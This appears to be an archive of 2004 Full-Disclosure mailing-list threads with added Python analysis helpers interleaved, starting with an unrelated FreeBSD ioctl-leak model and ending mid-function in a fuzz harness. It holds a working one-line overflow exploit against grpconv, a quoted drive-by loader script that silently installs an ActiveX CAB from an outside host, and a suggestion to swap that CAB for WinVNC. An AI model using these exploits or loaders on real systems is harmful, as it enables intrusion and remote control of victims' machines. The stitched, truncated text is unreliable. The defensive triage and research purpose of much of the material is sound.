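The advisory states the problem (coordinates trusted by the CONS_SCRSHOT ioctl) and the impact (kernel memory returned to the caller) without a picture of how one leads to the other. Here is an added example, not FreeBSD code, that models it in userland: KMEM is one bytes object holding the screen's character cells followed by constructed "adjacent" data, scrshot_unchecked() computes the copy window from the caller's numbers the way an ioctl that trusts them would, and scrshot_checked() adds the validation a fix needs. The screen geometry, the cell size and the SECRET contents are this example's assumptions; the negative-coordinate case is covered by the check but not simulated, because Python slicing has no pointer arithmetic to go below the buffer.

```python
COLS, ROWS = 80, 25
CELL = 2                                     # one cell: character byte + attribute byte
SCREEN = bytes(COLS * ROWS * CELL)           # the display, all blank
SECRET = b"login: root password: hunter2\n"  # constructed data that happens to follow it
KMEM = SCREEN + SECRET                       # "kernel memory": screen buffer, then other data


def scrshot_unchecked(x, y, xsize, ysize):
    """Copy ysize rows of xsize cells starting at cell (x, y). The offsets
    come straight from the caller, so a window that starts on row ROWS or
    runs past column COLS copies whatever follows the screen buffer."""
    out = b""
    for row in range(ysize):
        start = ((y + row) * COLS + x) * CELL
        out += KMEM[start:start + xsize * CELL]
    return out


def scrshot_checked(x, y, xsize, ysize):
    """The validation a fix has to do: reject negatives outright, then
    compare each size against the space left from the origin, a form that
    cannot wrap the way x + xsize can in 32-bit C arithmetic."""
    if x < 0 or y < 0 or xsize < 0 or ysize < 0:
        raise ValueError("EINVAL: negative coordinate or size")
    if xsize > COLS - x or ysize > ROWS - y:
        raise ValueError("EINVAL: window extends beyond the screen")
    return scrshot_unchecked(x, y, xsize, ysize)


def leak_demo():
    """One row requested just below the last real row: the unchecked call
    hands back the first 2*xsize bytes past the screen buffer."""
    xsize = len(SECRET) // CELL
    return scrshot_unchecked(0, ROWS, xsize, 1)


if __name__ == "__main__":
    print("unchecked, y == ROWS:", leak_demo())
    try:
        scrshot_checked(0, ROWS, 1, 1)
    except ValueError as e:
        print("checked, y == ROWS:", e)
```

leak_demo() returns the SECRET bytes; the same request through scrshot_checked() raises, as does (79, 0, 2, 1), which only runs two cells past the right edge.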


 
Re: [Full-Disclosure] Test your windows OS

From: Berend-Jan Wever (skylinededup.tudelft.nl)
Date: Mon Oct 04 2004 - 18:08:51 CDT


Anybody wanna try if this shows a popup? It's 1 line, if it wraps put it back together:
-------------------------------
set !!!!!!=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 && %SystemRoot%\system32\grpconv AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
 AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ^N^A^N^A-------------------------------
Let me know if it works (off-list) and what system you're using. I developed it on win2ken sp4.
Tech stuff:
The string "^N^A^N^A" at the end should be typed "ctrl+N, ctrl+A, ctrl+N, ctrl+A". It works by installing a unicode shellcode in the environment string "!!!!!!" at 0x00010000. This should alphabetically be the first string, so the shellcode should be at 0x0001000e. I overwrite a return address (^N^A=0x0001000e). The unicode shellcode needs to know its own base address; that's why there's "^N^A" twice: the first one is used to return, the second one is popped off by the shellcode to get the base address.

Cheers,
SkyLined

----- Original Message -----
From: "Berend-Jan Wever" <skylinededup.tudelft.nl>
To: <full-disclosurelists.netsys.com>
Sent: Monday, October 04, 2004 17:39
Subject: [Full-Disclosure] Test your windows OS

> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what they're doing? Run these commands from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory; most of them will either ignore the parameter or report an error because the parameter doesn't make sense... But on my win2k system I found 6 programs vulnerable to these very simple format string and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in themselves: you cannot gain access or elevate privileges, but I just wanted to let you know that these programmers did a sloppy job.
>
> Cheers,
> SkyLined
>



 
[Full-Disclosure] RE: On Polymorphic Evasion (an alphanumeric version)

From: m conover (mconover_001hotmail.com)
Date: Mon Oct 04 2004 - 20:39:15 CDT


Cool. I will also add to the discussion with an alphanumeric version written
with two others for experimentation, though it is limited in it doesn't vary
the length of the decoder stubs or encoded shellcode. spoonm is doing a
separate version--I think based on Berend's alpha--that will. Also, I did
not test it against any of the different shellcode detectors like Fnord, so
I would be curious to know if anyone tries. IMO "as to whether the detection
of polymorphic shellcode was indeed an appropriate component of an IDS", I
think there is enough prior art on it that it's not really a big deal to
publish or discuss code implementing it. It is most likely better to have a
variety of generators to test the effectiveness of a shellcode detector. I
added a small blurb on additional options for OS-independence with
alphanumeric shellcode for IA-32e/AMD-64 since it adds the new RIP-relative
addressing. See attachment.

>"Phantasmal Phantasmagoria" <phantasmalhush.ai>
>10/01/2004 05:28 PM
>Please respond to
>phantasmalhush.ai
>
>
>To
>full-disclosurelists.netsys.com, bugtraqsecurityfocus.com,
>focus-idssecurityfocus.com
>cc
>
>Subject
>On Polymorphic Evasion
>
>
>
>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>- ------------------------------------
>
>On Polymorphic Evasion
>by Phantasmal Phantasmagoria
>phantasmalhush.ai




 
Re:[Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: devis (deviseasynix.net)
Date: Mon Oct 04 2004 - 20:34:18 CDT


<cruncher:~/jpegs > file ATPartners.cab                              [ 3:25AM]
ATPartners.cab: Microsoft Cabinet file, 52795 bytes, 2 files
<cruncher:~/jpegs > cabextract ATPartners.cab                        [ 3:25AM]
ATPartners.cab: WARNING; possible 5688 extra bytes at end of file.
Extracting cabinet: ATPartners.cab
  extracting ATPartners.inf
  extracting ATPartners.dll

All done, no errors.
<cruncher:~/jpegs > more ATPartners.inf                              [ 3:25AM]
[version]
signature="$CHICAGO$"
AdvancedINF=2.0

[DefaultInstall]
CopyFiles=CopySystemFiles
RegisterOCXs=RegisterOCXSection
AddReg=RegistryEntries
RegisterDlls=RegDlls

[CopySystemFiles]
ATPartners.dll,,,34

[RegDlls]
11,,ATPartners.dll, 1

[DestinationDirs]
CopySystemFiles=11

[RegisterOCXSection]
"%11%\ATPartners.dll"

[RegistryEntries]

[SourceDisksNames]
1="CAB File",,,
<cruncher:~/jpegs > file ATPartners.dll                              [ 3:25AM]
ATPartners.dll: MS-DOS executable (EXE), OS/2 or MS Windows
<cruncher:~/jpegs > strings ATPartners.dll

<-- Garbage cut -->

        F1.Organizer.1 = s 'F1 Organizer Class'
                CLSID = s '{00000EF1-0786-4633-87C6-1AA7A44296DA}'
        F1.Organizer = s 'F1 Organizer Class'
                CLSID = s '{00000EF1-0786-4633-87C6-1AA7A44296DA}'
                CurVer = s 'F1.Organizer.1'
        NoRemove CLSID
                ForceRemove {00000EF1-0786-4633-87C6-1AA7A44296DA} = s
'F1 Organizer Class'
                        ProgID = s 'F1.Organizer.1'
                        VersionIndependentProgID = s 'F1.Organizer'
                        ForceRemove 'Programmable'
                        InprocServer32 = s '%MODULE%'
                        {
                                val ThreadingModel = s 'Apartment'
                        }
                        'TypeLib' = s
'{EF100007-F409-426a-9E7C-CB211F2A9786}'
MSFT
.....
OLEAUT32.dll
USER32.dll
WININET.dll
LoadLibraryA
GetProcAddress
RegCloseKey
SaveDC
CoTaskMemFree
GetDC
InternetOpenA
F1.DLL
DllCanUnloadNow
DllGetClassObject
DllRegisterServer
DllUnregisterServer
<cruncher:~/jpegs >
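An added triage helper, not part of devis's post and not code from the ATPartners installer: a small Python script that parses the .inf shown above and reports what the install section copies and registers. The INF listing is embedded as a constructed sample; the LDID table (11 = the system32 directory) and the CopyFiles/RegisterDlls flag meanings follow the documented INF directive semantics, of which only a small subset is decoded here.

```python
"""Added triage helper: parse an ActiveX installer .inf and list what it
copies and registers, so the DLL drop seen above can be read off directly."""
import re

# Constructed sample: the ATPartners.inf listing shown in the post above.
SAMPLE_INF = """\
[version]
signature="$CHICAGO$"
AdvancedINF=2.0

[DefaultInstall]
CopyFiles=CopySystemFiles
RegisterOCXs=RegisterOCXSection
AddReg=RegistryEntries
RegisterDlls=RegDlls

[CopySystemFiles]
ATPartners.dll,,,34

[RegDlls]
11,,ATPartners.dll, 1

[DestinationDirs]
CopySystemFiles=11

[RegisterOCXSection]
"%11%\\ATPartners.dll"

[RegistryEntries]

[SourceDisksNames]
1="CAB File",,,
"""

# Logical disk identifiers (LDIDs) used by DestinationDirs; 11 is the
# system directory (system32), so this installer drops its DLL there.
LDID_NAMES = {10: "%windir%", 11: "%windir%\\system32", 24: "%SystemDrive%"}

# Subset of the documented CopyFiles flag bits.
COPY_FLAGS = {0x02: "COPYFLG_NOSKIP", 0x04: "COPYFLG_NOVERSIONCHECK",
              0x10: "COPYFLG_NO_OVERWRITE", 0x20: "COPYFLG_NO_VERSION_DIALOG"}


def parse_inf(text):
    """Return {section (lower-cased): [entry lines]} in file order, comments stripped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # ';' starts an INF comment
        if not line:
            continue
        header = re.match(r"^\[(.+?)\]$", line)
        if header:
            current = header.group(1).lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def _fields(line):
    return [f.strip() for f in line.split(",")]


def _names(csv):
    return [s.strip() for s in csv.split(",") if s.strip()]


def summarize_install(sections, install="defaultinstall"):
    """Follow the install section's directives and report file drops and
    COM self-registration (RegisterDlls flag 1 = call DllRegisterServer)."""
    directives = {}
    for entry in sections.get(install, []):
        if "=" in entry:
            key, value = entry.split("=", 1)
            directives[key.strip().lower()] = value.strip()
    dest = {}
    for entry in sections.get("destinationdirs", []):
        key, value = entry.split("=", 1)
        dest[key.strip().lower()] = int(value.split(",")[0])

    report = {"copies": [], "registers": [], "ocx": []}
    for sec in _names(directives.get("copyfiles", "")):
        ldid = dest.get(sec.lower())
        for f in map(_fields, sections.get(sec.lower(), [])):
            flags = int(f[3]) if len(f) > 3 and f[3] else 0
            names = [n for bit, n in sorted(COPY_FLAGS.items()) if flags & bit]
            report["copies"].append((f[0], ldid, LDID_NAMES.get(ldid, "?"), names))
    for sec in _names(directives.get("registerdlls", "")):
        for f in map(_fields, sections.get(sec.lower(), [])):
            ldid, name, flags = int(f[0]), f[2], int(f[3] or 0)
            how = "DllRegisterServer" if flags & 1 else "DllInstall" if flags & 2 else "none"
            report["registers"].append((name, ldid, how))
    for sec in _names(directives.get("registerocxs", "")):
        report["ocx"].extend(sections.get(sec.lower(), []))
    return report


if __name__ == "__main__":
    for kind, items in summarize_install(parse_inf(SAMPLE_INF)).items():
        for item in items:
            print(f"{kind:10s} {item}")
```

Run against the sample it reports one copy of ATPartners.dll into system32 with the no-skip and no-version-dialog flags, and one DllRegisterServer call on the same file, which is exactly the COM registration the `strings` output above (ProgID F1.Organizer, InprocServer32 = %MODULE%) would perform.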



 
Re: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: GuidoZ (uberguidozgmail.com)
Date: Tue Oct 05 2004 - 01:27:46 CDT


Bingo - that's what I found too. The javascript is what does the dirty work.

--
Peace. ~G

On Mon, 04 Oct 2004 09:55:19 -0500, Willem Koenings <iseceurope.com> wrote:
>
> hi,
>
> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> W.
>



 
Re: [Full-Disclosure] [suse-security] Anti-Virus Problem

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Tue Oct 05 2004 - 02:38:43 CDT


Dear Björn Scorey,

It's expected behaviour. EICAR is an executable file and the EICAR string
should only be detected at the beginning of the file.

--Monday, October 4, 2004, 9:33:18 PM, you wrote to full-disclosurelists.netsys.com:

BS> Hi Everyone !

BS> I am running Suse 9.0 and I have installed 

BS> qmail (netqmail  Ver. 1.05)
BS> amavis (amavis-new Ver. 20030616p5-23)
BS> antivir (Ver 2.08-16) 

BS> Antivir seems to be an evaluation version. (The one that came with Suse 9.0) 

BS> I downloaded the EICAR E-Mail Test Virus but when I send either
BS> an infected attachment or simply copy the virus string on the mail,
BS> the antivirus doesn't recognize the virus, and the mail passes
BS> normally. 

BS> However when I run antivir on the infected file (attachment) by
BS> itself, it recognizes the virus. The same occurred with f-prot
BS> (however I got some minor errors while installing f-prot). When I
BS> run either anti-virus scanner on my mailbox (mbox), none of them
BS> manage to see the virus. 

BS> Does anyone have an idea what's wrong?

BS> Regards
BS> Björn

--
~/ZARAZA
I swear by the bald head of the prophet Moses, I am going to eat you right now. (Twain)

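An added example, not part of 3APA3A's reply and not code from antivir or f-prot: a Python scanner that applies the EICAR detection rule described above (the 68-byte string at offset 0, at most 128 bytes in total, nothing but whitespace after it) to a raw mailbox and then to each MIME part after decoding. The message is constructed inline with placeholder addresses; it shows why a file scanner pointed at an mbox finds nothing (the attachment is base64-encoded, so the string is neither at offset 0 nor present in the raw bytes) while the same scanner run on the extracted attachment does.

```python
"""Added example: the EICAR detection rule, applied to a raw mailbox and to
the decoded attachments inside it."""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# The 68-byte EICAR anti-virus test string, as published by EICAR.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def is_eicar_file(data: bytes) -> bool:
    """EICAR's own rule: the string must start at offset 0, the file may be at
    most 128 bytes, and only whitespace may follow the string."""
    if len(data) > 128 or not data.startswith(EICAR):
        return False
    return data[len(EICAR):].strip(b" \t\r\n") == b""


def build_sample_mail() -> bytes:
    """Constructed message: the test file attached the way a mail client would
    send it (base64 transfer encoding).  Addresses are placeholders."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "scanner@example.invalid"
    msg["Subject"] = "EICAR test"
    msg.set_content("see attachment")
    msg.add_attachment(EICAR, maintype="application", subtype="octet-stream",
                       filename="eicar.com")
    return msg.as_bytes()


def scan_raw(raw: bytes) -> bool:
    """What a file scanner pointed at the whole mbox sees: the mailbox bytes,
    where the string is neither at offset 0 nor present once base64-encoded."""
    return is_eicar_file(raw)


def scan_message(raw: bytes):
    """Decode each MIME part and apply the rule to the decoded bytes; returns
    [(filename or content type, detected), ...] in message order."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    results = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        results.append((part.get_filename() or part.get_content_type(),
                        is_eicar_file(payload)))
    return results


if __name__ == "__main__":
    raw = build_sample_mail()
    print("raw mailbox flagged:", scan_raw(raw))
    print("string visible in raw bytes:", EICAR in raw)
    for name, hit in scan_message(raw):
        print(f"{name}: {'EICAR' if hit else 'clean'}")
```

The practical consequence for the setup in the thread is that the scanner has to be invoked by the MIME-aware layer (amavis hands each decoded part to the scanner) rather than on the mailbox file.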


 
[Full-Disclosure] nmapbot: using instant messaging as a remote administration tool

From: Abe Usher (abe.ushersharp-ideas.net)
Date: Mon Oct 04 2004 - 23:46:46 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've created a small proof of concept named "nmapbot" that shows it is
possible to use instant messaging as a platform for remote command and
control of computer systems.

Purpose:
- --------
To create a semi-intelligent security bot that uses instant messaging as
a platform for receiving commands and returning results.

Method:
- -------
Using Python, the AOL TOC protocol, Bayesian language processing, and
nmap 3.70, I hacked together a little bot that can run nmap and ping.
Future editions will include additional commands =)

The nmapbot rests squarely on the shoulders of python and projects such
as Py-AIML, AIMLBayes, GrokItBot, and Reverend. Many thanks to fyodor
et al. for the excellent tool suite in nmap 3.70.

If you are interested, you can find source code and documentation for
nmap bot at:
http://www.sharp-ideas.net

Cheers,
Abe Usher, CISSP

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBYic2T3X9miqOcSQRAtLuAJ9V6yH+aHzs4tRPvVIQhu9jGuDXkQCdEUCZ
g33XB8OYyWljCuCNPr1fpe8=
=Gg0O
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Test your windows OS

From: Steve Wray (stevemyself.gen.nz)
Date: Mon Oct 04 2004 - 23:10:48 CDT


Berend-Jan Wever wrote:
> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what they're doing? Run these commands from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory; most of them will either ignore the parameter or report an error because the parameter doesn't make sense... But on my win2k system I found 6 programs vulnerable to these very simple format string and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in themselves: you cannot gain access or elevate privileges, but I just wanted to let you know that these programmers did a sloppy job.

Fascinating; you've rediscovered one of the first vulnerability checks
ever devised!
:-)

You (and the rest of the list; everyone who hasn't already) should read
'The Unix Haters Handbook' (amusingly enough I find this online copy at
Microsoft http://research.microsoft.com/~daniel/uhh-download.html but it
is *not* a Microsoft book; it's way older than MS (IIRC)).

From O'Reilly's "Practical UNIX and Internet Security", chapter 27:

"Recall that the first study by Professor Barton Miller, cited in
Chapter 23, found that more than one-third of common programs supplied
by several UNIX vendors crashed or hung when they were tested with a
trivial program that generated random input. Five years later, he reran
the tests. The results? Although most vendors had improved to where
"only" one-fourth of the programs crashed, one vendor's software
exhibited a 46% failure rate! This failure rate was despite wide
circulation and publication of the report, and despite the fact that
Miller's team made the test code available for free to vendors.

Most frightening, the testing performed by Miller's group is one of the
simplest, least-effective forms of testing that can be performed
(random, black-box testing). Do vendors do any reasonable testing at all?"

Oh in fact I can now do better than that;
I found this snippet;

http://www.llnl.gov/CASC/calendar/miller.061200.html

where Miller says;
"This year (2000), we took another stab at random testing, this time
testing applications running on Windows/NT . Given valid random mouse
and keyboard input streams, we could crash or hang 45% of these
applications."

So yeah, it's a very valid technique you describe there, good results!

> Cheers,
> SkyLined



 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: GuidoZ (uberguidozgmail.com)
Date: Tue Oct 05 2004 - 01:37:24 CDT


Something else that I noticed - the AffilateID is encoded.
Decoding reveals this: +A0,J}h:B6^;9gy>7ue-}hx

Doesn't seem to really be important, but maybe useful when porting the
script. Those that would like to do such a thing should understand. ;)

--
Peace. ~G

On Mon, 4 Oct 2004 10:15:46 -0500 (CDT), Gossi The Dog
<gossiabate.veritynet.net> wrote:
> Yes... ThemeXP.org has this in the HTML..
>
> <!-- AUTO_PROMPT AD START --><script language="JavaScript" type="text/JavaScript"
> src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script>
> <!-- AUTO_PROMPT AD END -->
>
> Which calls...
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
>
> Which contains...
>
> document.write('<iframe id="downloads_manager"
>   style="position:absolute;visibility:hidden;"></iframe>');
>
> document_code = '<html><head>\n';
> document_code += '<\/head><body>\n';
> document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
>   classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
>   codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
>   HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID"
>   VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
> document_code += '<\/body><\/html>';
> downloads_manager.document.write(document_code);
> downloads_manager.document.close();
>
> setCookie('minpopup80wu03rd','test',1);
>
> ...which downloads http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> ...which means those using shitty MS browsers get owned, again.
>
> If you want a laugh, replace the CAB files which WinVNC or somesuch.
>
> --g

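An added analysis helper, not part of GuidoZ's or Gossi's posts and not code from the site in question: a Python script that pulls the ActiveX `<object>` out of the loader script quoted above, records its CLSID and codebase, notes the zero-size object and hidden iframe, and URL-decodes the parameters the way GuidoZ decoded AffiliateID. The script body is embedded as a constructed sample with its wrapped lines joined; the regexes are deliberately loose because the markup lives inside JavaScript string literals rather than a parsed DOM.

```python
"""Added analysis helper: pull the ActiveX <object> out of the loader script
and decode its parameters the way GuidoZ did for AffiliateID."""
import re
from urllib.parse import unquote

# Constructed sample: the Confirm80wu03rd.js body quoted in the post, with
# its wrapped lines joined back together.
SAMPLE_JS = r'''
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID" VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
'''

OBJECT_RE = re.compile(r"<object\b([^>]*)>(.*?)</object>", re.I | re.S)
PARAM_RE = re.compile(r"<param\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|(\S+))')
HIDDEN_IFRAME_RE = re.compile(r"<iframe\b[^>]*visibility\s*:\s*hidden", re.I)


def attrs(fragment):
    """Parse name=value pairs from inside a tag; names lower-cased, quotes removed."""
    return {m.group(1).lower(): (m.group(2) if m.group(2) is not None else m.group(3))
            for m in ATTR_RE.finditer(fragment)}


def extract_objects(source):
    """Return one record per <object> tag found in HTML or in JS string literals."""
    found = []
    for m in OBJECT_RE.finditer(source):
        a = attrs(m.group(1))
        params = {}
        for p in PARAM_RE.finditer(m.group(2)):
            pa = attrs(p.group(1))
            if "name" in pa:
                params[pa["name"]] = unquote(pa.get("value", ""))  # %XX-decode
        found.append({
            "clsid": a.get("classid", "").lower().replace("clsid:", ""),
            "codebase": a.get("codebase"),
            "zero_size": a.get("height") == "0" and a.get("width") == "0",
            "params": params,
        })
    return found


def uses_hidden_iframe(source):
    return bool(HIDDEN_IFRAME_RE.search(source))


def triage(source):
    """Summarise the indicators a defender would record from a loader script."""
    objs = extract_objects(source)
    return {
        "hidden_iframe": uses_hidden_iframe(source),
        "objects": objs,
        "codebases": sorted({o["codebase"] for o in objs if o["codebase"]}),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_JS), indent=2))
```

The CLSID it extracts is the same one the `strings` output of ATPartners.dll registers under F1.Organizer, and the codebase is the CAB URL from the post, which is what ties the script, the CAB and the DLL together when recording indicators.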


 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: GuidoZ (uberguidozgmail.com)
Date: Tue Oct 05 2004 - 01:33:11 CDT


> If you want a laugh, replace the CAB files which WinVNC or somesuch.

Intriguing indeed. However, you'll want to make a CAB file out of it,
not just an EXE. The CLSID and install params are for CABs. Not too
difficult to do, though, with a little Google hunting and some time. =)

--
Peace ~G

On Mon, 4 Oct 2004 10:15:46 -0500 (CDT), Gossi The Dog
<gossiabate.veritynet.net> wrote:
> Yes... ThemeXP.org has this in the HTML..
>
> <!-- AUTO_PROMPT AD START --><script language="JavaScript" type="text/JavaScript"
> src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script>
> <!-- AUTO_PROMPT AD END -->
>
> Which calls...
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
>
> Which contains...
>
> document.write('<iframe id="downloads_manager"
>   style="position:absolute;visibility:hidden;"></iframe>');
>
> document_code = '<html><head>\n';
> document_code += '<\/head><body>\n';
> document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
>   classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
>   codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
>   HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID"
>   VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
> document_code += '<\/body><\/html>';
> downloads_manager.document.write(document_code);
> downloads_manager.document.close();
>
> setCookie('minpopup80wu03rd','test',1);
>
> ...which downloads http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> ...which means those using shitty MS browsers get owned, again.
>
> If you want a laugh, replace the CAB files which WinVNC or somesuch.
>
> --g



 
Re: [Full-Disclosure] nmapbot: using instant messaging as a remote administration tool

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Tue Oct 05 2004 - 04:49:02 CDT


Dear Abe Usher,

There is at least 1 Miranda plugin (nRemX) for remote command execution
via different IM protocols.

--Tuesday, October 5, 2004, 8:46:46 AM, you wrote to full-disclosurelists.netsys.com:

AU> -----BEGIN PGP SIGNED MESSAGE-----
AU> Hash: SHA1

AU> I've created a small proof of concept named "nmapbot" that shows it is
AU> possible to use instant messaging as a platform for remote command and
AU> control of computer systems.

AU> Purpose:
AU> - --------
AU> To create a semi-intelligent security bot that uses instant messaging as
AU> a platform for receiving commands and returning results.

AU> Method:
AU> - -------
AU> Using Python, the AOL TOC protocol, Bayesian language processing, and
AU> nmap 3.70, I hacked together a little bot that can run nmap and ping.
AU> Future editions will include additional commands =)

AU> The nmapbot rests squarely on the shoulders of python and projects such
AU> as Py-AIML, AIMLBayes, GrokItBot, and Reverend. Many thanks to fyodor
AU> et al. for the excellent tool suite in nmap 3.70.

AU> If you are interested, you can find source code and documentation for
AU> nmap bot at:
AU> http://www.sharp-ideas.net

AU> Cheers,
AU> Abe Usher, CISSP

AU> -----BEGIN PGP SIGNATURE-----
AU> Version: GnuPG v1.2.4 (MingW32)
AU> Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

AU> iD8DBQFBYic2T3X9miqOcSQRAtLuAJ9V6yH+aHzs4tRPvVIQhu9jGuDXkQCdEUCZ
AU> g33XB8OYyWljCuCNPr1fpe8=
AU> =Gg0O
AU> -----END PGP SIGNATURE-----


--
~/ZARAZA
And now, William, think this letter over carefully. (Twain)



 
Re: [Full-Disclosure] Test your windows OS

From: Vincent Archer (varcherdenyall.com)
Date: Tue Oct 05 2004 - 04:33:33 CDT


On Tue, Oct 05, 2004 at 05:10:48PM +1300, Steve Wray wrote:
> So yeah, its a very valid technique you describe there, good results!

Aeons ago, in the deep ages when the Macintosh first came out, there
was a small app which was called Monkey Test which did the same thing.
Generate continuous streams of random mouse, click and keyboard events.

An application was "crash proof" not if it didn't crash, but if it did
survive more than 5 min of that test.

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com
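The random-input robustness testing this thread keeps returning to (the oversized-argument runs in the original post, Miller's fuzz studies quoted by Steve Wray, and the Monkey Test described above), as an added example written by none of the posters: a small Python harness that runs a program with random printable arguments of random length and classifies each run as ok, error, crash (died from a signal) or hang (no exit before a timeout), the categories Miller's reports count. The target is a constructed, hypothetical stand-in script that aborts when its argument exceeds a 64-byte buffer; any real program would be passed as the command list instead.

```python
"""Added example: a Miller-style random-input robustness harness that runs a
program with random or oversized arguments and classifies how each run ends."""
import random
import signal
import subprocess
import sys
from dataclasses import dataclass


@dataclass
class Outcome:
    arg_len: int
    kind: str          # "ok", "error", "crash" or "hang"
    detail: str


def classify(returncode: int):
    """On POSIX a negative return code means the child died from that signal
    (e.g. -11 is SIGSEGV); anything else is a normal exit status."""
    if returncode < 0:
        try:
            return "crash", signal.Signals(-returncode).name
        except ValueError:
            return "crash", f"signal {-returncode}"
    return ("ok" if returncode == 0 else "error"), f"exit {returncode}"


def run_case(cmd, arg: str, timeout: float = 5.0) -> Outcome:
    """Run one case; a child that neither exits nor dies within the timeout
    is recorded as a hang, the other failure mode Miller's tests counted."""
    try:
        proc = subprocess.run(cmd + [arg], capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return Outcome(len(arg), "hang", f"no exit within {timeout}s")
    kind, detail = classify(proc.returncode)
    return Outcome(len(arg), kind, detail)


def fuzz(cmd, rounds: int = 20, max_len: int = 4096, seed: int = 1):
    """Random printable-ASCII arguments of random length; the fixed seed makes
    any crashing case reproducible."""
    rng = random.Random(seed)
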